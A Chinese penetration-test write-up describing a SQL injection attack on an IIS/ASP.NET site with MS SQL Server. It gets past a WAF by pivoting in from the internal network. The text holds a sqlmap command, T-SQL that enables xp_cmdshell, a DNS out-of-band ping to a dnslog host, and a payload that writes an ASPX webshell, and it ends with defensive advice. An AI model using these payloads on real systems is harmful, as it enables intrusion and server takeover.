实战记录：曲线救国攻防技术分析

1. 目标环境侦察

• 目标系统：IIS7.0 + ASP.NET组合
• 发现漏洞：前台登录页面疑似存在SQL注入漏洞
• 数据库类型：MS SQL Server

2. 初始渗透尝试

2.1 SQL注入初步测试

使用sqlmap进行自动化测试：

sqlmap -r x.txt -v 3 --random-agent --dbms=mssql --batch

结果：成功识别数据库但被WAF/安全设备拦截

2.2 手工绕过尝试

尝试使用堆叠查询和xp_cmdshell进行命令执行：

-- 开启xp_cmdshell
EXEC sp_configure 'show advanced options',1;RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;

-- 尝试DNS带外通信
EXEC master..xp_cmdshell 'ping xxx.dnslog.cn -n 2'

问题分析：

1. 可能被WAF拦截
2. 目标服务器可能不出网
3. 语句构造可能存在问题

3. 曲线救国策略

3.1 横向渗透思路

1. 放弃直接攻击目标站点
2. 从同一单位的其他子域入手
3. 通过其他站点进入内网
4. 在内网中尝试MS17-010、PTH等攻击手段

3.2 内网渗透过程

1. 成功获取目标所属B段中一台Linux服务器权限
2. 建立代理进入内网
3. 发现内网MS17-010漏洞已修补
4. fscan扫描结果无显著可利用点

3.3 内网SQL注入重新尝试

关键发现：内网中不受WAF/安全设备影响

再次使用sqlmap成功注入：

sqlmap -r x.txt -v 3 --random-agent --dbms=mssql --batch

注入结果：

• DBA权限
• 系统权限：低权限用户
• 注入类型：堆叠+延时注入（响应极慢）

4. 获取Webshell

4.1 手工注入写shell

%';EXEC xp_cmdshell 'echo "xxx" > D:\xxx\xxx\xxx.aspx' -- -

关键点：

1. 站库未分离
2. 低权限用户需选择可写目录（上传目录或图片路径）
3. 避免尝试写入根目录（权限不足）

4.2 提权过程

使用"土豆"提权技术完成权限提升

5. 技术要点总结

1. WAF绕过策略：

   • 从内网绕过外部安全设备
   • 使用延时注入避免触发实时防护

2. 内网渗透思路：

   • 通过关联资产寻找突破口
   • 内网环境通常防护较弱

3. 低权限利用技巧：

   • 准确识别可写目录
   • 避免不必要的权限尝试

4. 工具选择：

   • sqlmap自动化测试
   • 手工注入精确控制
   • fscan内网扫描

5. 时间管理：

   • 评估攻击路径时间成本
   • 及时调整策略

6. 防御建议

1. 网络架构：

   • 实施严格的网络隔离
   • 内网同样需要安全防护

2. 漏洞修复：

   • 及时修补MS17-010等已知漏洞
   • 禁用不必要的存储过程如xp_cmdshell

3. 权限控制：

   • 实施最小权限原则
   • 站库分离部署

4. 监控措施：

   • 部署内网异常行为检测
   • 监控SQL注入尝试

5. 应急响应：

   • 建立快速响应机制
   • 定期进行渗透测试